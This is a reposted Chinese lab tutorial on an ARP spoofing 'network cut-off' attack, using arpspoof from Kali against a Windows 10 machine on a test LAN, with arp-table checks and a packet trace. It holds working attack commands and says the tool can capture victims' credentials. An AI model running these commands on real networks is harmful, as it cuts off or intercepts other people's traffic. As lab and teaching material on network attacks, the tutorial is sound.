0


ARP渗透与攻防(二)之断网攻击

ARP断网攻击

系列文章

ARP渗透与攻防(一)之ARP原理

1.环境准备

kali 作为ARP攻击机,IP地址:192.168.110.26 MAC地址:00:0c:29:fc:66:46

win10 作为被攻击方,IP地址:192.168.110.12 MAC地址:1c:69:7a:a4:cf:92

网关(路由器),IP地址:192.168.110.1 MAC地址:e4:3a:6e:35:98:00

需要注意的时,两台主机需要在同一个局域网,并且网络通畅。

ping www.mashibing.com

在这里插入图片描述

计算上网的过程示意图:

在这里插入图片描述

2.ARP断网攻击原理

.ARP断网攻击的原理是:向目标主机不断的发送ARP报文,然后将其报文中的网关Mac地址设置成为攻击机的主机MAC地址,
然后目标主机想要访问网络发送数据包时,都会发送到攻击机,然后攻击机只需要做一个丢弃数据包的命令,就可以断掉目标主机的网络了。

3.arpspoof介绍:

arpspoof [spuːf] 是一个好用的ARP欺骗工具,攻击者通过毒化受害者ARP缓存,将网关MAC替换为攻击者MAC,然后攻击者可截获受害者发送和收到的数据包,从而获取受害者账户、密码等相关敏感信息。Kali linux中自带了该工具。

在这里插入图片描述

命令使用讲解

arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
-i:指定网卡
-c:攻击机的IP
-t 目标机器的IP
-r:网关IP

4.具体攻击步骤:

1.首先确保两台机器在同一局域网络下,并且可以互相通讯。

​ 1.1查看kali的IP和MAC地址:

ip a

在这里插入图片描述

​ 1.2 查看windows的IP和MAC地址:

ipconfig /all

在这里插入图片描述

​ 1.3 然后我们通过windows ping kali去保证我们的网络通畅:

ping 192.168.110.26

在这里插入图片描述

​ 1.4 win10 查看arp表,记录网关的信息

arp -a | findstr 192.168.110.1

在这里插入图片描述
可以看到现在网关绑定的MAC地址是正确的,是e4:3a:6e:35:98:00

2.kali进行断网攻击

arpspoof -i eth0 -r 192.168.110.1 -t 192.168.110.12
-i:指定网卡
-r:指定网关ip
-t:指定靶机ip

在这里插入图片描述
这个时候,kali机就会发起一个攻击,将在windows的arp表里存储着的网关的MAC地址替换为Kali机的MAC地址,导致中间人攻击,此时Windows访问外部的网络就不通过网关来转发了,而是通过我们的攻击机进行转发。但是由于我们的kali机没有开启路由转发的功能,导致windows机的流量虽然经过了kali转发,但最终并没有访问外网。

3.win10 查看网络连接 和 kali 的网络链接

ping www.mashibing.com

在这里插入图片描述
在这里插入图片描述

可以看到我们Windows ping 不通外部网络了

4.win10查看此时的arp表

arp -a 
或者
arp -a |findstr 192.168.110.1

在这里插入图片描述

5.kali机器结束断网攻击

ctrl+C

在这里插入图片描述

6.win10重新查看网络状态

ping www.mashibing.com

在这里插入图片描述
可以看到Windows机器又重新恢复了上网功能

7.win10重新查看arp表

arp -a |findstr 192.168.110.1

在这里插入图片描述
我们网关的MAC地址也从kali机的MAC地址恢复成了正常的MAC地址

5.ARP断网攻击原理深入分析

**1.ARP攻击断网的过程 **

0:c:29:fc:66:46 1c:69:7a:a4:cf:92 0806 42: arp reply 192.168.110.1 is-at 0:c:29:fc:66:46
0:c:29:fc:66:46 e4:3a:6e:35:98:0 0806 42: arp reply 192.168.110.12 is-at 0:c:29:fc:66:46
ARP攻击机器 不停的在告诉 192.168.110.1(网关)  192.168.110.12 的mac地址是 00:0c:29:fc:66:46
ARP攻击机器 不停的在告诉 192.168.110.12(靶机) 192.168.110.1 的mac地址是 00:0c:29:fc:66:46

Ctrl+C停止攻击后
0:c:29:fc:66:46 1c:69:7a:a4:cf:92 0806 42: arp reply 192.168.110.1 is-at e4:3a:6e:35:98:0
0:c:29:fc:66:46 e4:3a:6e:35:98:0 0806 42: arp reply 192.168.110.12 is-at 1c:69:7a:a4:cf:92
ARP攻击机器 重新告诉 192.168.110.12(靶机) 192.168.110.1 的mac地址是 e4:3a:6e:35:98:0
ARP攻击机器 重新告诉 192.168.110.1(网关)  192.168.110.12 的mac地址是 1c:69:7a:a4:cf:92

2.ARP断网原理图:

在这里插入图片描述


本文转载自: https://blog.csdn.net/qq_64973687/article/details/128750676
版权归原作者 千负 所有, 如有侵权,请联系我们删除。

“ARP渗透与攻防(二)之断网攻击”的评论:

还没有评论